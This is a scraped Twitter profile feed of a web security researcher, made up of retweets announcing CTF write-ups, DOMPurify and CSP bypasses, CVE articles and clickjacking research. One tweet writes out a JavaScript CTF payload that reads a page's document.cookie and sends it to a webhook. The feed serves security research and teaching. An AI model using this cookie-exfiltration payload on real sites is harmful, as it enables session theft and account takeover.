huli (@aszx87410)'s Twitter Profile
huli

@aszx87410

Taiwan / Front-end Engineer <=> Security Researcher. Interested in web. CTF player at @Water_Paddler

ID: 4731524647

Website: https://blog.huli.tw/en/ | Joined: 09-01-2016 03:51:10

2.2K Tweets

4.4K Followers

414 Following

Masato Kinugawa (@kinugawamasato):

Here is a bypass fixed in DOMPurify 3.1.7. It works only if special settings are used. Notice why the comment is closed with "->". masatokinugawa.github.io/xss/dompurify_…

Kévin GERVOT (Mizu) (@kevin_mizu):

My HeroCTF #web challenges write-ups are now available! :D mizu.re/post/heroctf-v… Here's a short list of the topics covered 👇
- Express res.download
- Chromium cache partitioning
- Service Worker hijacking through the Cache API
- Webpack DOM clobbering
1/2

icesfont (@icesfont2):

x = open("/"); setTimeout(() => { x.history.pushState(1,1,"/cookie"); setTimeout(() => { x.location = "javascript:'zzz'"; setTimeout(() => { location = `webhook?${encodeURIComponent(x.document.cookie)}`; }, 500); }, 500); }, 500); (this wasn't intended)

Kévin GERVOT (Mizu) (@kevin_mizu):

For this challenge, it was necessary to abuse a discrepancy between the DOM and the rendered page in Firefox's cache handling 💽 👉 bugzilla.mozilla.org/show_bug.cgi?i… This allows to shift iframe rendering from one to another leading to a sandbox bypass 🔥 👉 mizu.re/post/an-18-yea…

OtterSec (@osec_io):

NEW: A few months ago, we uncovered an authentication bypass in Web3Auth that could have led to full account takeover. In this deep dive, we break down how we found the issue and expose other authentication misconfigurations lurking in Web3. osec.io/blog/2025-07-0…

zhero; (@zhero___):

while waiting for the big article to come (soon), I share with you a small article concerning a small research which led to a simple CP-DoS on Nuxt Nuxt, show me your payload - a basic CP DoS resulting in CVE-2025-27415, good reading zhero-web-sec.github.io/research-and-t…

Harsh Jaiswal (@rootxharsh):

New Blogpost - We identified a vulnerability in Discourse where a misconfiguration in Rails send_file + Nginx's internal directive can expose database backups! projectdiscovery.io/blog/discourse… This issue isn't limited to Discourse. It can affect other Rails + Nginx apps with similar

もうダニ by 左京区在中 (@tyage):

In addition to this amazing discovery, there was another middleware bypass with the `__nextLocale` URL query that was fixed in 2024. I wrote a short article about this vuln CVE-2024-51479. gmo-cybersecurity.com/blog/another-n…

slonser (@slonser_):

Today I used a technique that’s probably not widely known in the community. In what cases could code like this lead to a vulnerability? ->

Jorian (@j0r1an):

Double-Clickjacking, or "press buttons on other sites without preconditions". After seeing and experimenting with this technique for a while, I cooked up a variation that combines many small tricks and ends up being quite convincing. Here's a flexible PoC: jorianwoltjer.com/blog/p/hacking…

terjanq (@terjanq):

For this year's Google CTF I created yet another Postviewer challenge called Postviewer v5². The challenge featured a seemingly impossible race condition. Client-side race conditions are an under-researched problem and could yield amazing real-world bugs! gist.github.com/terjanq/e66c28…

Kévin GERVOT (Mizu) (@kevin_mizu):

I'm happy to release a script gadgets wiki inspired by the work of Sebastian Lekies, koto, and Eduardo Vela in their Black Hat USA 2017 talk! 🔥 The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇 gmsgadget.com 1/4

sudi (@sudhanshur705):

Last year I found an XSS bug in Google IDX; here's a detailed writeup about it. Hope you will enjoy it, it's kinda lengthy :p Shoutouts to Matan Berson for finding the original bug in GitLab and to Sreeram KL and Sivanesh Ashok for the required chains to complete the exploit. sudistark.github.io/2025/07/02/idx…

Leandro Barragan (@lean0x2f):

"AI Agents for Offsec with Zero False Positives" by Brendan Dolan-Gavitt, a journey on how we managed to get 0 FPs with XBOW. You can find the slides for his BH talk here: cdn.prod.website-files.com/686c11d5bee015…
